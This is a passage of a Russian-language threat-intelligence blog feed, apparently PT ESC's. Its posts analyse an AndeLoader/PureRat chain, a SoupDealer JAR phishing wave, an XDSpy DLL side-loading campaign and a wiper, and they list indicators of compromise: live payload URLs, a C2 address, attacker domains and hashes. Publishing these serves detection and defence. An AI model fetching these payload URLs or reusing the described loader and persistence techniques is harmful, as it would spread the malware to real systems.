<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">firebasestorage.googleapis.com/v0/b/remasd-6c702.firebasestorage.app/o/image.jpg?alt=media&amp;token=c16438a4-4eeb-4116-adc7-373fbf7359b0
modaaura.store/image.jpg?12711343</code></span></pre><br />
<br />
🖼 В картинке ищутся теги <code>BASE64_START</code> и <code>BASE64_END</code>, между которыми находится закодированный в base64 .NET-загрузчик AndeLoader, который скачивает <code>exe</code> с переданного ему URL:<br />
<br />
<pre class="wp-block-code"><span><code lang="yaml" class="hljs language-yaml language-yaml"><span class="hljs-string">https://raw.githubusercontent.com/sergo20261/proxi/refs/heads/main/vc27012026upload.txt</span></code></span></pre><br />
<br />
AndeLoader запускает легитимный процесс <code>MsBuild.exe</code> и внедряет в него полученный вредоносный код. Подобная схема характерна для инструмента Crypters and Tools, <a href="https://ptsecurity.com/research/pt-esc-threat-intelligence/crypters-and-tools-odin-instrument-dlya-tysyach-vredonosnyh-fajlov/#id8" rel="noopener" target="_blank">описанного нами ранее.</a><br />
<br />
В этот раз C2 оказался по адресу <code>62.84.98.217:56001</code> (<em>скриншот 5</em>). Естественно, подобные трюки не могли остаться незамеченными в PT Sandbox, и ВПО было заблокировано песочницей.<br />
<br />
🚧 <strong>Покопавшись в репозитории sergo20261, мы нашли три проекта:</strong><br />
<br />
• proxihost<br />
• proxi<br />
• text<br />
<br />
<strong>Файлов в них великое множество, самые интересные из них:</strong><br />
<br />
• написанные на Rust загрузчики вредоноса PureRat;<br />
• исполняемые файлы PureRat;<br />
• различные .txt-файлы, в которых содержатся закодированные данные в Base64 (файл <code>vc27012026upload.txt</code>, упоминаемый по ссылке выше, относится к ним же).<br />
<br />
Напоследок хотелось бы отметить, что описанный здесь набор инструментов, запускавшихся с помощью Crypters and Tools, — PureRat и его rust-загрузчики — мелькал в сентябрьских атаках 2025 года и <a href="https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/" rel="noopener" target="_blank">подробно описывался в статье.</a><br />
<br />
<strong>IoCs</strong><br />
<br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">Акт сверки и претензия.eml -&gt; 71a8920aa71afde02a466e08508642561b98a99632351cdd1c1ce3ab805a10ba
pretenziya_27012026_akt_sverka_1C_PDF.bat -&gt; 1d3e6b81479717282fb0f661fba3603b3f9f9c9d857a0f2fa8035b7015ab1f0a
vc27012026upload.txt -&gt; 9abcfce5cb991f60652c4b410e45ad40f4b0eafe30c2209f0c6e6636b424d5db
Rust загрузчик -&gt; 93e0fb947cff4ab361c307590a078549ab9e885d04e23b12a800296dd4d6c4a4
PureHVNC -&gt; 49fde62919aec811780e67073a7e70566594477ef7b19905e1b8aa42438f6d98

62.84.98.217
firebasestorage.googleapis.com/v0/b/remasd-6c702.firebasestorage.app/o/image.jpg?alt=media&amp;token=c16438a4-4eeb-4116-adc7-373fbf7359b0
modaaura.store/image.jpg?12711343</code></span></pre>

<figure class="wp-block-image"><img width="1024" height="740" src="/wp-content/uploads/2026/02/photo_497@06-02-2026_15-56-45-1024x740.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/02/photo_497@06-02-2026_15-56-45-1024x740.jpg 1024w, /wp-content/uploads/2026/02/photo_497@06-02-2026_15-56-45-300x217.jpg 300w, /wp-content/uploads/2026/02/photo_497@06-02-2026_15-56-45-768x555.jpg 768w, /wp-content/uploads/2026/02/photo_497@06-02-2026_15-56-45.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="531" src="/wp-content/uploads/2026/02/photo_498@06-02-2026_15-56-46-1024x531.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/02/photo_498@06-02-2026_15-56-46-1024x531.jpg 1024w, /wp-content/uploads/2026/02/photo_498@06-02-2026_15-56-46-300x156.jpg 300w, /wp-content/uploads/2026/02/photo_498@06-02-2026_15-56-46-768x398.jpg 768w, /wp-content/uploads/2026/02/photo_498@06-02-2026_15-56-46.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="466" src="/wp-content/uploads/2026/02/photo_499@06-02-2026_15-56-46-1024x466.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/02/photo_499@06-02-2026_15-56-46-1024x466.jpg 1024w, /wp-content/uploads/2026/02/photo_499@06-02-2026_15-56-46-300x136.jpg 300w, /wp-content/uploads/2026/02/photo_499@06-02-2026_15-56-46-768x349.jpg 768w, /wp-content/uploads/2026/02/photo_499@06-02-2026_15-56-46.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="740" src="/wp-content/uploads/2026/02/photo_500@06-02-2026_15-56-46-1024x740.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/02/photo_500@06-02-2026_15-56-46-1024x740.jpg 1024w, /wp-content/uploads/2026/02/photo_500@06-02-2026_15-56-46-300x217.jpg 300w, /wp-content/uploads/2026/02/photo_500@06-02-2026_15-56-46-768x555.jpg 768w, /wp-content/uploads/2026/02/photo_500@06-02-2026_15-56-46.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>

<br />
<br />
<span class="hashtag">#avlab</span> <span class="hashtag">#sandbox</span> <span class="hashtag">#TI</span> <span class="hashtag">#ioc</span> <span class="hashtag">#malware</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Новая порция супа</title>
		<link>/a-new-portion-of-soup/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Wed, 04 Feb 2026 21:52:44 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[avlab]]></category>
		<category><![CDATA[emailsecurity]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[sandbox]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d0%bd%d0%be%d0%b2%d0%b0%d1%8f-%d0%bf%d0%be%d1%80%d1%86%d0%b8%d1%8f-%d1%81%d1%83%d0%bf%d0%b0/</guid>

					<description><![CDATA[Новая порция супа 🍜 Летом 2025 зарубежные коллеги уже писали про троян SoupDealer — атака специализированная под пользователей из Турции. У семпла было много особенностей, ключевая из которых — он представлял из…]]></description>
										<content:encoded><![CDATA[<strong>Новая порция супа</strong> 🍜<br />
<br />
Летом 2025 зарубежные коллеги уже писали про троян <a href="http://malwation.com/blog/technical-analysis-of-a-stealth-java-loader-used-in-phishing-campaigns-targeting-turkiye" rel="noopener" target="_blank">SoupDealer</a> — атака специализированная под пользователей из Турции. У семпла было много особенностей, ключевая из которых — он представлял из себя JAR-файл с множественными техниками обфускации AllatoriObfuscator и защитами от динамического анализа. Например, он запускается исключительно на устройствах с турецкой локалью (<em>скриншот 1</em>). Не будем вдаваться во все подробности — семейство уже было подробно происследовано.<br />
<br />
Сегодня мы заметили, что началась новая волна атак с использованием того же семейства (<em>скриншот 2</em>), заблокированная в нашей песочнице PT Sandbox. Все они соответствуют примерно одному паттерну: письмо со ссылкой на Google Drive с просьбой проверить документы; по ссылке находится вредоносный JAR-файл. И мы бы не стали обращать на это внимание (каждый день мы блокируем огромное множество семплов), но на текущий момент все еще не все семплы детектируются популярными защитными средствами (<em>скриншот 3</em>).<br />
<br />
Поэтому — выкладываем индикаторы компрометации, чтобы средства защиты смогли оперативно доработать свою экспертизу.<br />
<br />
<strong>Адреса отправителей:</strong><br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">arslan@arsavukatlik.com
bilgi@dermamed.com.tr</code></span></pre><br />
<br />
<strong>C2:</strong><br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">gocmenkusgiller.blog</code></span></pre><br />
<br />
<strong>Имена файлов:</strong><br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">YENI URUNLER ICIN FIYAT TALEBI3.jar
FIYAT TEKLIFI BEKLENEN URUN LISTESI.jar</code></span></pre><br />
<br />
<strong>Хеши файлов SHA-256:</strong><br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">90ead7a262450a9bace5686f11fc39cbd607a0d681ef9ff39d8766d9b4c0de2e
8dc7f7d298291c042e9f51feff3c8d690f4889a9a141e9657d33da7bb8456c7f</code></span></pre>

<figure class="wp-block-image"><img width="1024" height="570" src="/wp-content/uploads/2026/02/photo_493@04-02-2026_21-52-44-1024x570.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/02/photo_493@04-02-2026_21-52-44-1024x570.jpg 1024w, /wp-content/uploads/2026/02/photo_493@04-02-2026_21-52-44-300x167.jpg 300w, /wp-content/uploads/2026/02/photo_493@04-02-2026_21-52-44-768x427.jpg 768w, /wp-content/uploads/2026/02/photo_493@04-02-2026_21-52-44.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="599" src="/wp-content/uploads/2026/02/photo_494@04-02-2026_21-52-45-1024x599.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/02/photo_494@04-02-2026_21-52-45-1024x599.jpg 1024w, /wp-content/uploads/2026/02/photo_494@04-02-2026_21-52-45-300x176.jpg 300w, /wp-content/uploads/2026/02/photo_494@04-02-2026_21-52-45-768x449.jpg 768w, /wp-content/uploads/2026/02/photo_494@04-02-2026_21-52-45.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>

<br />
<br />
<span class="hashtag">#phishing</span> <span class="hashtag">#ti</span> <span class="hashtag">#ioc</span> <span class="hashtag">#avlab</span> <span class="hashtag">#emailsecurity</span> <span class="hashtag">#sandbox</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Наряд-заказ на работу вредоноса</title>
		<link>/work-order-for-a-malicious-actor/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Mon, 26 Jan 2026 17:04:41 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d0%bd%d0%b0%d1%80%d1%8f%d0%b4-%d0%b7%d0%b0%d0%ba%d0%b0%d0%b7-%d0%bd%d0%b0-%d1%80%d0%b0%d0%b1%d0%be%d1%82%d1%83-%d0%b2%d1%80%d0%b5%d0%b4%d0%be%d0%bd%d0%be%d1%81%d0%b0/</guid>

					<description><![CDATA[Наряд-заказ на работу вредоноса ✍️ В середине января группа киберразведки зафиксировала кампанию хакерской группировки XDSpy, нацеленную на организации России и Белоруссии. Вредоносная DLL-библиотека и легитимный исполняемый файл распространяются в архивах (скриншот 1).…]]></description>
										<content:encoded><![CDATA[<strong>Наряд-заказ на работу вредоноса</strong> ✍️<br />
<br />
В середине января группа киберразведки зафиксировала кампанию хакерской группировки XDSpy, нацеленную на организации России и Белоруссии. Вредоносная DLL-библиотека и легитимный исполняемый файл распространяются в архивах (<em>скриншот 1</em>). В качестве приманок используются PDF-документы с тематикой договоров.<br />
<br />
1️⃣ После запуска исполняемого файла пользователю демонстрируется документ-приманка (<em>скриншот 2</em>), тогда как основные действия выполняются в фоне. Содержимое архива переносится в каталог <code>C:\Users\Public</code>, после чего осуществляется внедрение вредоносной DLL-библиотеки через <a href="https://mitre.ptsecurity.com/ru-RU/T1574.002" rel="noopener" target="_blank">технику DLL Side-Loading.</a> <br />
<br />
Закрепление в системе выполняется через запись в автозагрузке <code>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</code> с именем, совпадающим с названием легитимного EXE, и значением <code>C:\Users\Public{legit_exe_filename}</code>, что обеспечивает автоматический запуск компонента при входе пользователя в систему.<br />
<br />
2️⃣ На следующем этапе устанавливается сетевое взаимодействие с инфраструктурой злоумышленников. По заданной ссылке загружается полезная нагрузка, которая сохраняется в <code>C:\Users\Public</code>\ с последующим запуском.<br />
<br />
3️⃣ Отдельного внимания заслуживают домены группировки, с которых скачивается следующий стейдж. <br />
<br />
В теле HTML-страницы подконтрольных злоумышленникам сайтов находится обфусцированный JavaScript (<em>скриншот 3</em>), реализующий предварительную проверку телеметрии и признаков автоматизированной среды, включая наличие <code>navigator.webdriver</code>, индикаторы <code>headless</code> в <code>userAgent</code> и <code>appVersion</code>, корректность объектов <code>navigator.plugins</code> и <code>navigator.mimeTypes</code>, заполненность <code>language/languages</code>, а также аномальные значения <code>outerWidth/outerHeight</code>. Если клиент не проходит проверку, вместо выдачи последующего вредоносного стейджа домен возвращает редирект на скачивание крупного файла для тестирования скорости с домена <code>proof.ovh.net</code>.<br />
<br />
Такой подход затрудняет извлечение следующей стадии и снижает вероятность того, что исследователи вредоносного ПО смогут получить стейдж группировки для последующего реверс-инжиниринга. Ранее <a href="https://ptsecurity.com/research/pt-esc-threat-intelligence/analysis-of-hacker-groups-activity-the-third-quarter-of-2025/#id5" rel="noopener" target="_blank">мы уже описывали</a> схожую цепочку XDSpy и механизмы доставки следующей стадии.<br />
<br />
<strong>IoCs</strong><br />
<br />
<pre class="wp-block-code"><span><code lang="yaml" class="hljs language-yaml language-yaml"><span class="hljs-attr">Домены:</span>
<span class="hljs-string">weltimkrieg.net</span>
<span class="hljs-string">cflbombardier.org</span>
<span class="hljs-string">lelacdespassions.org</span>

<span class="hljs-attr">Архивы:</span>
<span class="hljs-string">7ce9d21fdd56d0881771502544ce5699</span>
<span class="hljs-string">67a8f63c021839e30ee2e1910dc07ff7</span>
<span class="hljs-string">3578a1b96820789059393ee9717d431c</span>
<span class="hljs-string">919c5f6ce38586bd827a82e97dd44fb1</span>

<span class="hljs-attr">Вредоносные DLL:</span>
<span class="hljs-string">e338abdf9c3160be43b0fa2ee9692292</span>
<span class="hljs-string">e758df62f6a0e52f37edd91d3fdf84ac</span>
<span class="hljs-string">33a72ef5916bafff2c83d0f4e0f2aa16</span>
<span class="hljs-string">0cf610531681f5aeef534f333026c6c2</span>

<span class="hljs-attr">EXE:</span>
<span class="hljs-string">96b307d7d8f4c8b9d7aca9f0ee2ede75</span>

<span class="hljs-attr">Документы-приманки:</span>
<span class="hljs-string">acd3ca48b3ce0677ecb7ab1ab57936f8</span>
<span class="hljs-string">ccc49c64b44977563a1fb7c6af52ceed</span>
<span class="hljs-string">df98e0bd1e8e6c20ab07bfe790a6ef6e</span></code></span></pre>

<figure class="wp-block-image"><img width="917" height="1024" src="/wp-content/uploads/2026/01/photo_482@26-01-2026_17-04-41-917x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/01/photo_482@26-01-2026_17-04-41-917x1024.jpg 917w, /wp-content/uploads/2026/01/photo_482@26-01-2026_17-04-41-269x300.jpg 269w, /wp-content/uploads/2026/01/photo_482@26-01-2026_17-04-41-768x858.jpg 768w, /wp-content/uploads/2026/01/photo_482@26-01-2026_17-04-41.jpg 1146w" sizes="auto, (max-width: 917px) 100vw, 917px" /></figure>
<figure class="wp-block-image"><img width="1024" height="616" src="/wp-content/uploads/2026/01/photo_483@26-01-2026_17-04-41-1024x616.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/01/photo_483@26-01-2026_17-04-41-1024x616.jpg 1024w, /wp-content/uploads/2026/01/photo_483@26-01-2026_17-04-41-300x180.jpg 300w, /wp-content/uploads/2026/01/photo_483@26-01-2026_17-04-41-768x462.jpg 768w, /wp-content/uploads/2026/01/photo_483@26-01-2026_17-04-41-1536x924.jpg 1536w, /wp-content/uploads/2026/01/photo_483@26-01-2026_17-04-41.jpg 2000w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>

<br />
<br />
<span class="hashtag">#TI</span> <span class="hashtag">#APT</span> <span class="hashtag">#ioc</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>consumerWiper: архитектура и механизм работы. часть 2</title>
		<link>/consumerwiper-architecture-and-mechanism-of-operation-part-2/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Mon, 12 Jan 2026 12:23:12 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[wiper]]></category>
		<guid isPermaLink="false">http://localhost:8080/consumerwiper-%d0%b0%d1%80%d1%85%d0%b8%d1%82%d0%b5%d0%ba%d1%82%d1%83%d1%80%d0%b0-%d0%b8-%d0%bc%d0%b5%d1%85%d0%b0%d0%bd%d0%b8%d0%b7%d0%bc-%d1%80%d0%b0%d0%b1%d0%be%d1%82%d1%8b-2/</guid>

					<description><![CDATA[consumerWiper: архитектура и механизм работы. Часть 2 ❗️ Выводы Анализ данного ВПО демонстрирует рациональный подход злоумышленников. Поскольку перезапись больших файлов занимает достаточно много времени, они прибегают к поэтапному уничтожению. На первом этапе…]]></description>
										<content:encoded><![CDATA[<strong>consumerWiper: архитектура и механизм работы</strong>. Часть 2 ❗️<br />
<br />
<strong>Выводы</strong><br />
<br />
Анализ данного ВПО демонстрирует рациональный подход злоумышленников. Поскольку перезапись больших файлов занимает достаточно много времени, они прибегают к поэтапному уничтожению. На первом этапе происходит частичное повреждение как можно большего количества файлов, и только после этого выполняется полная перезапись всех файлов. Подобная стратегия позволяет ВПО нанести как можно больший ущерб за короткое время.<br />
<br />
<strong>Хеш-суммы (SHA256):</strong><br />
<br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">7A00F5219F61850B5999BDE9669094AC8932971E15978D11962E42AF964C096C
89E0F599AFA7705DF55BF345C41236E70EFA813C7E82CAEE4171DCE678010B66
E4DFCF17AAB37F01B0D24010CAB1875F28EE545A9D330C85DE1A21EC682E840F
8554F4062D3FC3DD8EFEDA65B8620CE74D98B125627D5BE72BCA7B0930EDF737
5CFCE12D2C8687EBA1529EC82F93B85FF2B503959D19D82E9873C0C473CAEBE1
BA2D428D5B4E0EE1CC4A952FEC254DE453D8514E546F64919ABD13C0BBC59473</code></span></pre><br />
<br />
<span class="hashtag">#ioc</span> <span class="hashtag">#dfir</span> <span class="hashtag">#ir</span> <span class="hashtag">#wiper</span> <span class="hashtag">#malware</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
